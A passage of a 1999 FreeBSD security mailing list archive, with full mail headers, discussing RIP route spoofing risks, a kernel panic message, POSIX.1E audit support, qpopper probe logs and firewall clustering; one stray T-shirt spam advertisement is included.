Yes. In theory, routed can be used to enable someone to "remotely sniff" your machine, provided they are clever and you are not. Also, if someone adds enough routes, you overflow some allocated space, and on many/most systems you lose network capability if not crash. (DoS attack) Old SunOS systems would crash in the *coolest* ways when you added a couple thousand routes... -=Jim=- Addy & Associates To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 4 5:28:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 2FAA4151F7 for ; Sun, 4 Apr 1999 05:28:20 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.2/8.9.1) id OAA11871; Sun, 4 Apr 1999 14:26:20 +0200 (CEST) (envelope-from des) To: Nicole Harrington Cc: Dag-Erling Smorgrav , freebsd-security@FreeBSD.ORG Subject: Re: Someone trying to route to my machine? References: From: Dag-Erling Smorgrav Date: 04 Apr 1999 14:26:19 +0200 In-Reply-To: Nicole Harrington's message of "Sat, 03 Apr 1999 12:25:07 -0800 (PST)" Message-ID: Lines: 10 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nicole Harrington writes: > Even so, if someone detected I was running routed, could they use > that to try to route to a machine for some nefarius reason? They might fake route updates to make your computer route connections through theirs so they could sniff you or man-in-the-middle you. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 4 5:50:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from mx2.io.com (mx2.io.com [199.170.88.18]) by hub.freebsd.org (Postfix) with ESMTP id 643D215271 for ; Sun, 4 Apr 1999 05:50:38 -0700 (PDT) (envelope-from watkins@io.com) Received: from io.com (as1-dialup-66.io.com [206.224.82.66]) by mx2.io.com (8.9.1a/8.9.1a) with SMTP id HAA18841; Sun, 4 Apr 1999 07:48:31 -0500 Date: Sun, 4 Apr 1999 07:48:31 -0500 From: watkins@io.com Message-Id: <199904041248.HAA18841@mx2.io.com> To: watkins@io.com Subject: Do you have one? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Some people called the Ricky Willaims Heiman Siloutte shirt, others call it the Dreaded Football Player shirt. UT and the Downtown Athletic Club have tried to ban them through the Collegiate Licensing Company, but unsuccessfully. Thousands of people have got their hands on one of these shirts. We have some as well and are offering you a chance to get yours. This is the exact same shirt that was featured in the Austin American Stateman on December 15, 1998 in the Lifestyles section. Prices are as follows: White shirt with burnt orange siloutte. Sizes are S, M, L, XL, and XXL. XXL's ARE $3.00 MORE!!! 1. $16 +3.20 shipping =$19.20 2. $32 +3.20 shipping =$36.20 3. $48 +4.30 shipping =$52.30 4. $62 +4.30 shipping =$66.30 5. $70 +5.40 shipping =$75.40 Each shirt after 5 shirts is $14.00 each. Please add $1.10 shipping for every 2 shirts over 5 shirts. Burnt orange shirt with white siloutte. Sizes are L, XL, and XXL. XXL's ARE $3.00 MORE!!! 1. $18 +3.20 shipping =$21.20 2. $36 +3.20 shipping =$39.20 3. $52 +4.30 shipping =$56.30 4. $66 +4.30 shipping =$70.30 5. $80 +5.40 shipping =$85.40 Each shirt after 5 shirts is $16.00 each. Please add $1.10 shipping for every 2 shirts over 5 shirts. WE ALSO HAVE 3.5" x 3.5" PEELOUT VINYL STICKERS THAT GO GREAT ON WINDOWS. We will ship one free sticker per tshirt ordered. If you would like extras they are $2 each. Shipping prices reflect US Priority Mail which takes 2-3 day delivery. REMEMBER TO ADD $3.00 IF YOU WANT XXL. IF YOU DO NOT ADD THE $3.00 WE WILL SEND YOU AN XL INSTEAD. Please send check or money order to: JERIMIAH DOWDY PO BOX 2596 AUSTIN, TX 78768 Thank you for your time and have a Happy Easter. PS: If you are still skeptical about this offer, please send a Self Addressed Stamped Envelope along with your email address and/or telephone # and we will contact you to give you more information and a URL. We will not call you if it is long distance, so be sure to send an email address as well. THIS IS LIMITED OFFER! AFTER MAY 1, 1999, WE WILL NOT BE ACCEPTING ANY MORE ORDERS. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 4 12:17:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from main.websitebuilding.com (main.websitebuilding.com [209.98.117.130]) by hub.freebsd.org (Postfix) with SMTP id A4ADE14FE2 for ; Sun, 4 Apr 1999 12:16:35 -0700 (PDT) (envelope-from kingjedi@gzero.org) Received: (qmail 6511 invoked from network); 4 Apr 1999 19:09:22 -0000 Received: from softdnserror (HELO windows) (206.52.151.226) by gzero.org with SMTP; 4 Apr 1999 19:09:22 -0000 Message-ID: <005401be7ed0$7addb4c0$e29734ce@windows> From: "KingJedi" To: Subject: Can someone tell me what vm_page_free is? Date: Sun, 4 Apr 1999 14:21:23 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2014.211 X-Mimeole: Produced By Microsoft MimeOLE V5.00.2014.211 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Apr 4 13:08:32 main /kernel: vm_page_free: freeing wired page that was in my messages log, can anyone explain what this is? is it a security hole or something? The reason Im asking is because my machine reboots after it gets one of these every few days and its running FreeBSD 3.1 Release #2 Thanks, KJ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 4 16:20:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 6220D14CE1 for ; Sun, 4 Apr 1999 16:20:18 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id QAA09847; Sun, 4 Apr 1999 16:18:11 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id QAA27644; Sun, 4 Apr 1999 16:18:10 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id QAA06876; Sun, 4 Apr 1999 16:18:09 -0700 (PDT) From: Don Lewis Message-Id: <199904042318.QAA06876@salsa.gv.tsc.tdk.com> Date: Sun, 4 Apr 1999 16:18:09 -0700 In-Reply-To: Dag-Erling Smorgrav "Re: Someone trying to route to my machine?" (Apr 4, 2:26pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Dag-Erling Smorgrav , Nicole Harrington Subject: Re: Someone trying to route to my machine? Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Apr 4, 2:26pm, Dag-Erling Smorgrav wrote: } Subject: Re: Someone trying to route to my machine? } Nicole Harrington writes: } > Even so, if someone detected I was running routed, could they use } > that to try to route to a machine for some nefarius reason? } } They might fake route updates to make your computer route connections } through theirs so they could sniff you or man-in-the-middle you. This only works if their machine is on the same subnet as yours since the next hop specified in the route must be a directly connected network. Even without RIP, they could probably do the same thing with ARP or ICMP redirects. And if they are on the same subnet, they can probably silently sniff your traffic unless your network is switched and the switch is hardened so that it can't be tricked into directing your traffic to them. Unless the network only has one router connected to it (so that you can use a static default route), or you can use explicit static routes, you'll probably need some dynamic way of discovering the proper routes (RIP, ICMP redirects, etc.), and most of these can be spoofed. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 4 17:20:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 55D5615062 for ; Sun, 4 Apr 1999 17:20:06 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id RAA05022; Sun, 4 Apr 1999 17:16:47 -0700 (PDT) (envelope-from dillon) Date: Sun, 4 Apr 1999 17:16:47 -0700 (PDT) From: Matthew Dillon Message-Id: <199904050016.RAA05022@apollo.backplane.com> To: "KingJedi" Cc: Subject: Re: Can someone tell me what vm_page_free is? References: <005401be7ed0$7addb4c0$e29734ce@windows> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :Apr 4 13:08:32 main /kernel: vm_page_free: freeing wired page : :that was in my messages log, can anyone explain what this is? is it a :security hole or something? : :The reason Im asking is because my machine reboots after it gets one of :these every few days and its running FreeBSD 3.1 Release #2 : :Thanks, :KJ Something in the bowls of the VM system detected an 'impossible' situation. It's not a security hole or anything... just a kernel bug. If you are running 3.1, it is possible that the bug has already been fixed in the current -STABLE track. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 5 10:59:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 9FDCD14CBE for ; Mon, 5 Apr 1999 10:59:24 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id NAA22449 for ; Mon, 5 Apr 1999 13:56:41 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Mon, 5 Apr 1999 13:56:41 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: freebsd-security@freebsd.org Subject: POSIX.1E auditing support, an initial pass and some questions Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Over the past month, I have been working on a first pass at implementing system auditing for FreeBSD 4.0-CURRENT based on the POSIX.1E spec. I have an initial alpha version working at this point, and had some questions about appropriate ways to hook the behavior into the kernel efficiently and effectively. The URL for the existing code is http://www.watson.org/fbsd-hardening/posix1e/ The essential scheme goes a little like this: POSIX.1E supports a flexible "audit record" designed to describe a single event, be it a kernel event or an application-submitted event. The draft defines a number of accessor routines to retrieve, manipulate, store, and submit these records from userland. The large majority of the existing code implements this API, which is described in a fair degree of depth in the man pages included with the tarball. The kernel implementation currently makes use of an audit device (/dev/audit) to ship audit records from the kernel to a userland auditd, a daemon listening on the device, somewhat similar to syslogd and /dev/log. Auditd would be an excellent place to put filtering capabilities, and also IDS types of code. I'm currently working on a modular IDS plugin API for auditd so that modules capable of detecting various types of attacks or unusual behavior could hook into the record stream, and raise standard warnings, etc. This modular behavior is not included with the daemon; right now it just logs the audit records after doing a little filtering. My real questions have to do with the best way to hook syscalls: the audit format, for most syscalls, requires the logging of relevant arguments, information about the acting process (and optionally objects acted upon), and the return code (or error, and what kind of error it was security-wise). All records have some standard information, and some event-specific information. The results are fairly ugly and complicated kernel hooks, so far. First off, many times arguments are not copied into the kernel by the syscall itself, rather by a uio call as part of a vnode lookup; similarly, syscalls may exit in a number of places for a number of reasons, resulting in a lot of hook locations for the record. Right now I have hooked a few syscalls (no where near any significant number :-) as a proof-of-concept exploration of what might be involved, and am soliciting suggestions about a clean way to handle this. The code is under a 2-clause BSD-style license, and leaving aside the kernel code, should be portable to other platforms. Because this is extremely test-ish code, it's not something that anyone would want to run regularly except in a development sense. Also, without record filtering in place, even the few syscalls that are hooked generate a lot of output. However, feel free to download it, run it, etc. Because it adds new syscalls, it does require that you rebuild libc, so is probably not for the uninitiated. Please feel free to send questions to me directly or on this list; questions about the POSIX.1E spec should be addressed to the cross-platform POSIX.1E discussion list (posix1e@cyrus.watson.org). Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: 03 01 DD 8E 15 67 48 73 25 6D 10 FC EC 68 C1 1C Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 6 17:10:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from bureau6.utcc.utoronto.ca (bureau6.utcc.utoronto.ca [128.100.132.16]) by hub.freebsd.org (Postfix) with ESMTP id 7D66015453 for ; Tue, 6 Apr 1999 17:10:23 -0700 (PDT) (envelope-from pc.mackenzie@utoronto.ca) Received: from cgowave-45-163.cgocable.net ([24.226.45.163] HELO pauler.homer.com ident: NO-IDENT-SERVICE [port 2792]) by bureau6.utcc.utoronto.ca with SMTP id <180192-29358>; Tue, 6 Apr 1999 20:08:12 -0400 Message-Id: <4.1.19990406200132.00992430@mail.elehost.com> X-Sender: pc.mackenzie@mailbox21.utcc.utoronto.ca X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Tue, 06 Apr 1999 20:07:42 -0400 To: freebsd-security@FreeBSD.ORG From: Paul MacKenzie Subject: Should I be worried, Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Quick message to allay a few fears. The other day I found this in the logs... Apr 3 06:43:44 server popper[20031]: @m-burg-01.rewiss.fu-berlin.de: -ERR POP EOF received Apr 3 06:43:45 server /kernel: ipfw: 13610 Accept TCP 160.45.166.130:22904 xxx.xxx.xxx.xxx:23 in via ed0 Apr 3 06:43:45 server /kernel: ipfw: 13610 Accept TCP 160.45.166.130:22904 xxx.xxx.xxx.xxx:23 out via ed1 (the xxx.xxx.xxx.xxx address being the same above in both cases) This person was obviously an outsider because I have no clients in this part of the world. Any thoughts on why Qpopper send this back assuming they have no access to any e-mail addresses? As well the above error was shown a number of times for different addresses (as though a scanner was run on a certain subnet mask). Should I be concerned? Thanks for any insight and discussion this opens up, Sincerely Paul To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 6 18:22:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from pro.via-rs.com.br (pro.via-rs.com.br [200.248.240.235]) by hub.freebsd.org (Postfix) with ESMTP id BD6A314E02 for ; Tue, 6 Apr 1999 18:22:01 -0700 (PDT) (envelope-from lauro@pro.via-rs.com.br) Received: from pro.via-rs.com.br (as09.sa05.procergs.com.br [200.248.231.9]) by pro.via-rs.com.br (8.9.1a/8.9.1) with ESMTP id WAA27773 for ; Tue, 6 Apr 1999 22:22:59 -0300 (EST) Message-ID: <370AB13A.3F2A2042@pro.via-rs.com.br> Date: Tue, 06 Apr 1999 22:13:30 -0300 From: Lauro Barbosa X-Mailer: Mozilla 4.5 [en] (Win95; I) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: FreeBSD 2.2.8 and DES Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello! Please, i need help. I have a server with FreeBSD 2.2.8 and DES instaled. In this server the users can to login using login_name or login_name. (whit dot at end). for example: john or john. Anybody know this problem ? How can to correct this ? Sorry my poor english. Please send me a answer in private to lauro@pro.via-rs.com.br, thanks, Lauro. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 6 19: 9:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from iisi.co.jp (ns.iisi.co.jp [203.180.102.129]) by hub.freebsd.org (Postfix) with ESMTP id 4AE9D15613 for ; Tue, 6 Apr 1999 19:09:18 -0700 (PDT) (envelope-from wen@iisi.co.jp) Received: from wen (wen.iisi.co.jp [203.180.102.179]) by iisi.co.jp (8.7.3+2.6Wbeta5-NAO.1/3.4W2:19960712 183202) with SMTP id LAA20316 for ; Wed, 7 Apr 1999 11:06:00 +0900 (JST) Message-ID: <00b201be809b$ced53cc0$b366b4cb@wen.iisi.co.jp> From: "GuangChun Wen" To: Subject: Cluster service in FreeBSD Date: Wed, 7 Apr 1999 11:10:28 +0900 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-2022-jp" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi everyone: I am planning to use Freebsd as our firewall. I wonder if there are ports or products which can automatically balancing the loads between several servers, or takes over failed server with another server,maybe like cluster service in NT? I wonder if anybody can give me information about documents which describe such techniques. thanks, To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 6 20:57:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from trooper.velocet.ca (trooper.velocet.net [209.167.225.226]) by hub.freebsd.org (Postfix) with ESMTP id 25D1315041 for ; Tue, 6 Apr 1999 20:57:15 -0700 (PDT) (envelope-from dgilbert@trooper.velocet.ca) Received: (from dgilbert@localhost) by trooper.velocet.ca (8.8.7/8.8.7) id XAA11017; Tue, 6 Apr 1999 23:55:04 -0400 (EDT) From: David Gilbert MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14090.55064.212139.89533@trooper.velocet.ca> Date: Tue, 6 Apr 1999 23:55:04 -0400 (EDT) To: "GuangChun Wen" Cc: Subject: Cluster service in FreeBSD In-Reply-To: <00b201be809b$ced53cc0$b366b4cb@wen.iisi.co.jp> References: <00b201be809b$ced53cc0$b366b4cb@wen.iisi.co.jp> X-Mailer: VM 6.62 under Emacs 19.34.2 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> "GuangChun" == GuangChun Wen writes: GuangChun> Hi everyone: I am planning to use Freebsd as our firewall. GuangChun> I wonder if there are ports or products which can GuangChun> automatically balancing the loads between several servers, GuangChun> or takes over failed server with another server,maybe like GuangChun> cluster service in NT? GuangChun> I wonder if anybody can give me information about documents GuangChun> which describe such techniques. While I'm sure that they do it differently with NT, I'd guess that you could effectively do this with some fancy routing protocols with BSD. But... then there's the issue that with NT... you want to plan for failure 'cause it's so common. Dave. -- ============================================================================ |David Gilbert, Velocet Communications. | Two things can only be | |Mail: dgilbert@velocet.net | equal if and only if they | |http://www.velocet.net/~dgilbert | are precisely opposite. | =========================================================GLO================ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 6 21:28:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from aniwa.sky (p33-max12.wlg.ihug.co.nz [216.100.145.33]) by hub.freebsd.org (Postfix) with ESMTP id BD0BF151ED for ; Tue, 6 Apr 1999 21:28:04 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from aniwa.sky (localhost [127.0.0.1]) by aniwa.sky (8.9.1a/8.9.1) with ESMTP id QAA03277; Wed, 7 Apr 1999 16:25:50 +1200 (NZST) Message-Id: <199904070425.QAA03277@aniwa.sky> X-Mailer: exmh version 2.0.2 2/24/98 To: Paul MacKenzie Cc: freebsd-security@FreeBSD.ORG Subject: Re: Should I be worried, In-reply-to: Your message of "Tue, 06 Apr 1999 20:07:42 -0400." <4.1.19990406200132.00992430@mail.elehost.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 07 Apr 1999 16:25:49 +1200 From: Andrew McNaughton Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You've obviously been probed. The POP EOF message likely resulted from the connection being dropped without a QUIT command. You might care enough to verify whether this is how popper reports such a situation. grepping the popper source for that error message is probably the fastest way to get an idea of what causes such an error message. Andrew McNaughton > Quick message to allay a few fears. The other day I found this in the logs... > > Apr 3 06:43:44 server popper[20031]: @m-burg-01.rewiss.fu-berlin.de: -ERR > POP EOF received > Apr 3 06:43:45 server /kernel: ipfw: 13610 Accept TCP 160.45.166.130:22904 > xxx.xxx.xxx.xxx:23 in via ed0 > Apr 3 06:43:45 server /kernel: ipfw: 13610 Accept TCP 160.45.166.130:22904 > xxx.xxx.xxx.xxx:23 out via ed1 > > (the xxx.xxx.xxx.xxx address being the same above in both cases) > > This person was obviously an outsider because I have no clients in this > part of the world. Any thoughts on why Qpopper send this back assuming they > have no access to any e-mail addresses? > > As well the above error was shown a number of times for different addresses > (as though a scanner was run on a certain subnet mask). > > Should I be concerned? > > Thanks for any insight and discussion this opens up, > > Sincerely > > Paul > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- ----------- Andrew McNaughton andrew@squiz.co.nz http://www.newsroom.co.nz/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 6 21:40:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from tasam.com (tasam.com [209.219.168.22]) by hub.freebsd.org (Postfix) with ESMTP id 2D38F151ED for ; Tue, 6 Apr 1999 21:40:55 -0700 (PDT) (envelope-from clash@tasam.com) Received: from bug (bug.tasam.com [206.161.113.114]) by tasam.com (8.9.3/8.9.1) with SMTP id AAA18095; Wed, 7 Apr 1999 00:38:42 -0400 (EDT) Message-ID: <021101be80b0$89523c60$7271a1ce@bug.tasam.com> From: "Joe Gleason" To: "Paul MacKenzie" , "Andrew McNaughton" Cc: Subject: Re: Should I be worried, Date: Wed, 7 Apr 1999 00:36:42 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.2106.4 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It is, my automated scripts that make sure TCP is still answering on ports such as 110 fill my logs with messages like: Apr 4 20:00:14 shell1 popper[1723]: @xxx.xxxxxx.com: -ERR POP EOF received Joe Gleason Tasam > >You've obviously been probed. The POP EOF message likely resulted from the >connection being dropped without a QUIT command. You might care enough to >verify whether this is how popper reports such a situation. > >grepping the popper source for that error message is probably the fastest way >to get an idea of what causes such an error message. > >Andrew McNaughton > > > > > >> Quick message to allay a few fears. The other day I found this in the logs... >> >> Apr 3 06:43:44 server popper[20031]: @m-burg-01.rewiss.fu-berlin.de: -ERR >> POP EOF received >> Apr 3 06:43:45 server /kernel: ipfw: 13610 Accept TCP 160.45.166.130:22904 >> xxx.xxx.xxx.xxx:23 in via ed0 >> Apr 3 06:43:45 server /kernel: ipfw: 13610 Accept TCP 160.45.166.130:22904 >> xxx.xxx.xxx.xxx:23 out via ed1 >> >> (the xxx.xxx.xxx.xxx address being the same above in both cases) >> >> This person was obviously an outsider because I have no clients in this >> part of the world. Any thoughts on why Qpopper send this back assuming they >> have no access to any e-mail addresses? >> >> As well the above error was shown a number of times for different addresses >> (as though a scanner was run on a certain subnet mask). >> >> Should I be concerned? >> >> Thanks for any insight and discussion this opens up, >> >> Sincerely >> >> Paul >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message >> > >-- >----------- >Andrew McNaughton >andrew@squiz.co.nz >http://www.newsroom.co.nz/ > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 6 23:14:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id 898F615751 for ; Tue, 6 Apr 1999 23:14:40 -0700 (PDT) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.1/frmug-2.3/nospam) with UUCP id IAA11386 for freebsd-security@FreeBSD.ORG; Wed, 7 Apr 1999 08:12:39 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr) Received: by keltia.freenix.fr (Postfix, from userid 101) id 2A61D87B6; Wed, 7 Apr 1999 08:08:45 +0200 (CEST) Date: Wed, 7 Apr 1999 08:08:45 +0200 From: Ollivier Robert To: freebsd-security@FreeBSD.ORG Subject: Re: Should I be worried, Message-ID: <19990407080845.A4157@keltia.freenix.fr> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <4.1.19990406200132.00992430@mail.elehost.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.95.3i In-Reply-To: <4.1.19990406200132.00992430@mail.elehost.com>; from Paul MacKenzie on Tue, Apr 06, 1999 at 08:07:42PM -0400 X-Operating-System: FreeBSD 4.0-CURRENT/ELF ctm#5173 AMD-K6 MMX @ 200 MHz Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to Paul MacKenzie: > This person was obviously an outsider because I have no clients in this > part of the world. Any thoughts on why Qpopper send this back assuming they > have no access to any e-mail addresses? This is a probe (probably from a script kiddie) for the well known qpopper bug. Contact the ISP/site who own the address and ask them to spank this sucker. -- Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 4.0-CURRENT #70: Sat Feb 27 09:43:08 CET 1999 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 7 1: 3:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from bofh.fastnet.co.uk (lart.org.uk [194.207.104.22]) by hub.freebsd.org (Postfix) with ESMTP id 39992155FF for ; Wed, 7 Apr 1999 01:03:20 -0700 (PDT) (envelope-from synak@bofh.fastnet.co.uk) Received: (from root@localhost) by bofh.fastnet.co.uk (8.8.8/8.8.8) id JAA22312; Wed, 7 Apr 1999 09:01:10 +0100 (BST) (envelope-from synak) Date: Wed, 7 Apr 1999 09:01:10 +0100 From: Jay Tribick To: GuangChun Wen Cc: freebsd-security@FreeBSD.ORG Subject: Re: Cluster service in FreeBSD Message-ID: <19990407090110.A22226@bofh.fastnet.co.uk> References: <00b201be809b$ced53cc0$b366b4cb@wen.iisi.co.jp> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: <00b201be809b$ced53cc0$b366b4cb@wen.iisi.co.jp>; "GuangChun Wen" on 07.04.1999 @ 03:10:28 BST Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi > I am planning to use Freebsd as our firewall. > I wonder if there are ports or products which can > automatically balancing the loads between several servers, > or takes over failed server with another server,maybe > like cluster service in NT? > > I wonder if anybody can give me information about > documents which describe such techniques. You may want to try the following: http://www.eddieware.org/ What services will you be allowing to pass via your firewall? -- Regards, Jay Tribick [| Network Admin | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 7 1:52:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from volodya.prime.net.ua (volodya.prime.net.ua [195.64.229.17]) by hub.freebsd.org (Postfix) with ESMTP id 3E6DF15655 for ; Wed, 7 Apr 1999 01:52:19 -0700 (PDT) (envelope-from andyo@prime.net.ua) Received: from prime.net.ua (localhost.prime.net.ua [127.0.0.1]) by volodya.prime.net.ua (8.8.8/8.8.8) with ESMTP id LAA00387; Wed, 7 Apr 1999 11:56:53 +0300 (EEST) (envelope-from andyo@prime.net.ua) Message-ID: <370B1DD3.3D2AFDA9@prime.net.ua> Date: Wed, 07 Apr 1999 11:56:52 +0300 From: "Andy V. Oleynik" Organization: M-Info X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 2.2.7-RELEASE i386) X-Accept-Language: ru, uk, en MIME-Version: 1.0 To: Ollivier Robert Cc: freebsd-security@FreeBSD.ORG Subject: Re: Should I be worried, References: <4.1.19990406200132.00992430@mail.elehost.com> <19990407080845.A4157@keltia.freenix.fr> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Does this bug described somewhere? Does it exist in latest version of popper? Ollivier Robert wrote: > According to Paul MacKenzie: > > This person was obviously an outsider because I have no clients in this > > part of the world. Any thoughts on why Qpopper send this back assuming they > > have no access to any e-mail addresses? > > This is a probe (probably from a script kiddie) for the well known qpopper > bug. Contact the ISP/site who own the address and ask them to spank this > sucker. > -- > Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr > FreeBSD keltia.freenix.fr 4.0-CURRENT #70: Sat Feb 27 09:43:08 CET 1999 > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- WBW Andy V. Oleynik (When U work in virtual office U have good chance to obtain 